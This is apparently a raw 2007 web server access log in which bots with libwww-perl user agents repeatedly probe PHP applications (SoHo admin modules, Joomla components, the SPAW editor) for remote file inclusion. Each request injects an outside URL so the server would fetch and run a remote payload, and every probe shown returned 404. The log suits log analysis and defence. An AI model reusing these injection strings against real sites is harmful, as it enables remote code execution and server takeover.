64.34.170.230 - - [06/Aug/2007:02:01:25 -0700] "GET /admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.34.170.230 - - [06/Aug/2007:02:01:25 -0700] "GET /logs/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:02:01:25 -0700] "GET /logs/access_070716.log/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:02:01:33 -0700] "GET /logs/access_070730.log/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:02:01:33 -0700] "GET /admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:02:01:34 -0700] "GET /logs/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.34.170.230 - - [06/Aug/2007:02:01:34 -0700] "GET /logs/access_070716.log/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:02:05:36 -0700] "GET /logs/access_070730.log/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:02:05:36 -0700] "GET /admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:02:05:36 -0700] "GET /logs/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:02:05:36 -0700] "GET /logs/access_070716.log/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.10.128.68 - - [06/Aug/2007:02:06:59 -0700] "GET /logs//index.php?file=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.68 - - [06/Aug/2007:02:06:59 -0700] "GET //index.php?file=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.204.130 - - [06/Aug/2007:02:07:41 -0700] "GET /logs//index.php?p=http://www.witheringinjustice.com/oA/newspublish/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [06/Aug/2007:02:07:42 -0700] "GET //index.php?p=http://www.witheringinjustice.com/oA/newspublish/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.241.193.173 - - [06/Aug/2007:02:09:49 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://chireo.info/n00gr00d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.78.98.108 - - [06/Aug/2007:02:12:35 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://topnlpsites.com/images/gif/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.101.50.155 - - [06/Aug/2007:02:13:20 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
208.101.50.155 - - [06/Aug/2007:02:13:21 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
212.239.26.16 - - [06/Aug/2007:02:13:34 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/